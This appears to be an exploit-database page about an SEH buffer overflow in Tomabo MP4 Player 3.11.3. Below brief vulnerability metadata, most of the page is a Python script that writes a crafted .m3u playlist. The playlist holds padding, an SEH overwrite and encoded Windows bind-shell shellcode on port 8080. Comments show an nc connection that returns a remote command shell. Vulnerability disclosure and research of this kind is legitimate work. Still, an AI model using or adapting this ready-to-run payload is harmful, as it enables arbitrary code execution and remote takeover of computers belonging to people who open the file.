header-logo
Suggest Exploit
vendor:
Tomabo MP4 Player
by:
Saeid Atabaki
9.8
CVSS
CRITICAL
SEH Buffer Overflow
119
CWE
Product Name: Tomabo MP4 Player
Affected Version From: 3.11.2003
Affected Version To: 3.11.2003
Patch Exists: NO
Related CWE:
CPE: a:tomabo:mp4_player:3.11.3
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2015

Tomabo MP4 Player 3.11.3 – (.m3u) SEH Buffer Overflow

This is an exploit for a SEH buffer overflow vulnerability in Tomabo MP4 Player version 3.11.3. By crafting a specially crafted .m3u file, an attacker can overwrite the Structured Exception Handler (SEH) to execute arbitrary code.

Mitigation:

Update to the latest version of Tomabo MP4 Player.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow 
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#---------------------------------------------------------------------# 

import sys, struct
file="crash.m3u"

# Windows bind shell port 8080, feel free to swap shellcode
sc =  ""
sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
sc += "\x6c\x19\xa9\x11"

payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00"  + "\x90" * 20 + sc

writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()